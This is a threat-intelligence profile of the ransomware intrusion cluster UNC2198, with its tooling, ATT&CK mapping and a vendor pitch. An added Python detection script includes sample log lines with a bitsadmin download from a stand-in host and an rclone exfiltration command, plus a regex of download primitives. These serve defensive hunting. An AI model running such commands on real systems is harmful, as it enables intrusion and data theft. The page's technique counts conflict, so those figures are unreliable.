
UNC2198

Also known as: unc2198

UNC2198 is a financially motivated intrusion cluster tracked by Mandiant that used ICEDID infections as an initial foothold to monetize intrusions through ransomware deployment. Mandiant described it as the most prominent ICEDID-enabled threat cluster in the reporting and attributed nine separate intrusions in 2020 to the group. UNC2198 targeted organizations in North America across a breadth of industries. In at least five cases, it acquired initial access from UNC2420's phishing distribution chain involving MOUSEISLAND, PHOTOLOADER, and ICEDID.

Mandiant observed UNC2198 deploy MAZE ransomware in July 2020 and later shift to EGREGOR in October and November 2020, with the UNC2198-UNC2414 merge assessed as significant because it revealed UNC2198 had access to EGREGOR ransomware. Mandiant merged related clusters UNC2374 and UNC2414 into UNC2198 based on shared infrastructure and artifacts, including shared Cobalt Strike certificate subject details on TCP port 25055, shared WINDARC and BEACON file paths, shared code-signing certificate usage, shared ICEDID-based initial access, and shared RCLONE usage from C:\PerfLogs\rclone.exe.

Observed tradecraft included InnoSetup droppers to install the WINDARC backdoor; BITS jobs and remote PowerShell downloads to retrieve tools such as SYSTEMBC; use of Cobalt Strike BEACON, Metasploit METERPRETER, KOADIC, and PowerShell EMPIRE; discovery activity including BloodHound and commands such as whoami, net group, nltest, and arp; lateral movement via WinRM and RDP; remote execution of BEACON service binaries; and SMB BEACON launched via PowerShell in at least one case. In one intrusion, UNC2198 used the SOURBITS utility to exploit CVE-2020-0787 for privilege escalation. Prior to ransomware deployment, UNC2198 exfiltrated hundreds of gigabytes of victim data using RCLONE, consistently observed at C:\PerfLogs\rclone.exe.

Mandiant measured time-to-ransom from ICEDID activity to ransomware deployment at 5.5 days for MAZE, deployed via PsExec, and 1.5 days for EGREGOR, deployed via forced GPO updates. Known aliases and merged sub-groups directly mentioned in the content are UNC2374 and UNC2414.
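As an added illustration (not part of the Mallory page or Mandiant's reporting), the Python below hunts process-creation logs for three of the pre-ransomware staging behaviours described above: rclone executing from C:\PerfLogs, a burst of the named discovery commands on a single host, and BITS or PowerShell tool downloads. The log events are constructed, and the download command patterns (bitsadmin, Start-BitsTransfer, DownloadString/DownloadFile, Invoke-WebRequest) are assumed representatives rather than commands the reporting attributes to UNC2198.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events (hypothetical, not from the Mandiant report).
# Fields: ISO timestamp, host, image path, command line.
EVENTS = [
    ("2020-10-01T09:00:05", "WS01", r"C:\Windows\System32\whoami.exe", "whoami"),
    ("2020-10-01T09:00:20", "WS01", r"C:\Windows\System32\net.exe", 'net group "domain admins" /domain'),
    ("2020-10-01T09:01:10", "WS01", r"C:\Windows\System32\nltest.exe", "nltest /dclist:corp"),
    ("2020-10-01T09:02:00", "WS01", r"C:\Windows\System32\ARP.EXE", "arp -a"),
    ("2020-10-01T10:15:00", "WS01", r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer job /download http://example.invalid/t.exe C:\PerfLogs\t.exe"),
    ("2020-10-02T22:40:00", "FS01", r"C:\PerfLogs\rclone.exe", r"rclone.exe copy E:\Shares remote:bucket -q"),
    ("2020-10-02T08:00:00", "WS07", r"C:\Windows\System32\whoami.exe", "whoami"),  # lone command, not a burst
]

RCLONE_PATH = r"c:\perflogs\rclone.exe"  # path the reporting observed consistently
DISCOVERY_IMAGES = {"whoami.exe", "net.exe", "nltest.exe", "arp.exe"}  # commands named in the reporting
# Assumed representative primitives for "BITS jobs and remote PowerShell downloads".
DOWNLOAD_RE = re.compile(r"bitsadmin.*/transfer|start-bitstransfer|downloadstring|downloadfile|invoke-webrequest", re.I)

def rclone_from_perflogs(events):
    """Hosts where rclone ran from the PerfLogs staging path seen before ransomware deployment."""
    return sorted({host for _, host, image, _ in events if image.lower() == RCLONE_PATH})

def discovery_bursts(events, window=timedelta(minutes=10), min_distinct=3):
    """Hosts where at least min_distinct different discovery commands ran within one window."""
    per_host = defaultdict(list)
    for ts, host, image, _ in events:
        name = image.lower().rsplit("\\", 1)[-1]
        if name in DISCOVERY_IMAGES:
            per_host[host].append((datetime.fromisoformat(ts), name))
    hits = []
    for host, runs in per_host.items():
        runs.sort()
        for i, (t0, _) in enumerate(runs):  # slide a window starting at each run
            if len({n for t, n in runs[i:] if t - t0 <= window}) >= min_distinct:
                hits.append(host)
                break
    return sorted(hits)

def tool_downloads(events):
    """Hosts whose command lines show BITS or PowerShell download primitives."""
    return sorted({host for _, host, _, cmd in events if DOWNLOAD_RE.search(cmd)})

def hunt(events):
    """Run all three checks; a host that appears in more than one list deserves priority."""
    return {"rclone_perflogs": rclone_from_perflogs(events),
            "discovery_burst": discovery_bursts(events), "tool_download": tool_downloads(events)}
```

Feed real Sysmon Event ID 1 or Windows 4688 records into the same tuple shape to run the checks against production data; WS01 here trips two checks and would be the first host to triage.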


MITRE ATT&CK

Tradecraft

19 distinct techniques observed across reporting, grouped by tactic.

10 of 15 tactics, 32 techniques. ×N = number of intelligence reports citing this technique.
TA0001 Initial Access (2 techniques)
  T1133 External Remote Services
  T1566 Phishing
    T1566.001 Spearphishing Attachment

TA0002 Execution (4 techniques)
  T1047 Windows Management Instrumentation
  T1053 Scheduled Task/Job
    T1053.005 Scheduled Task
  T1059 Command and Scripting Interpreter
    T1059.001 PowerShell
    T1059.003 Windows Command Shell
  T1569 System Services
    T1569.002 Service Execution

TA0003 Persistence (3 techniques)
  T1053 Scheduled Task/Job
    T1053.005 Scheduled Task
  T1112 Modify Registry
  T1133 External Remote Services

TA0004 Privilege Escalation (1 technique)
  T1053 Scheduled Task/Job
    T1053.005 Scheduled Task

TA0005 Stealth (1 technique)
  T1027 Obfuscated Files or Information

TA0112 Defense Impairment (1 technique)
  T1112 Modify Registry

TA0007 Discovery (4 techniques)
  T1016 System Network Configuration Discovery
  T1069 Permission Groups Discovery
  T1087 Account Discovery
  T1482 Domain Trust Discovery

TA0008 Lateral Movement (1 technique)
  T1021 Remote Services
    T1021.001 Remote Desktop Protocol
    T1021.002 SMB/Windows Admin Shares

TA0011 Command and Control (3 techniques)
  T1071 Application Layer Protocol
    T1071.001 Web Protocols
  T1090 Proxy
    T1090.003 Multi-hop Proxy
  T1105 Ingress Tool Transfer

TA0040 Impact (1 technique)
  T1486 Data Encrypted for Impact
IOCs

Observables

37 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. IOC values are gated; view them in Mallory or pipe them straight into your SIEM.

What this page doesn't show

The version that knows your environment. This page is what's public. Mallory adds the parts that aren't: sector and geo overlap with your footprint, the IOCs they're burning right now, detection coverage, and what to do next.

- Target overlap: match sector + geo + tech-stack targeting against your real footprint.
- Tradecraft mapping (19): every observed MITRE ATT&CK technique, grouped by tactic.
- Malware arsenal (10): families this actor is known to deploy, with IOCs and behavior.
- Exploited CVEs (1): CVEs this actor has used in known campaigns.
- Detection signatures: YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
- Observables (37): domains, IPs, and hashes tied to this actor, refreshed continuously.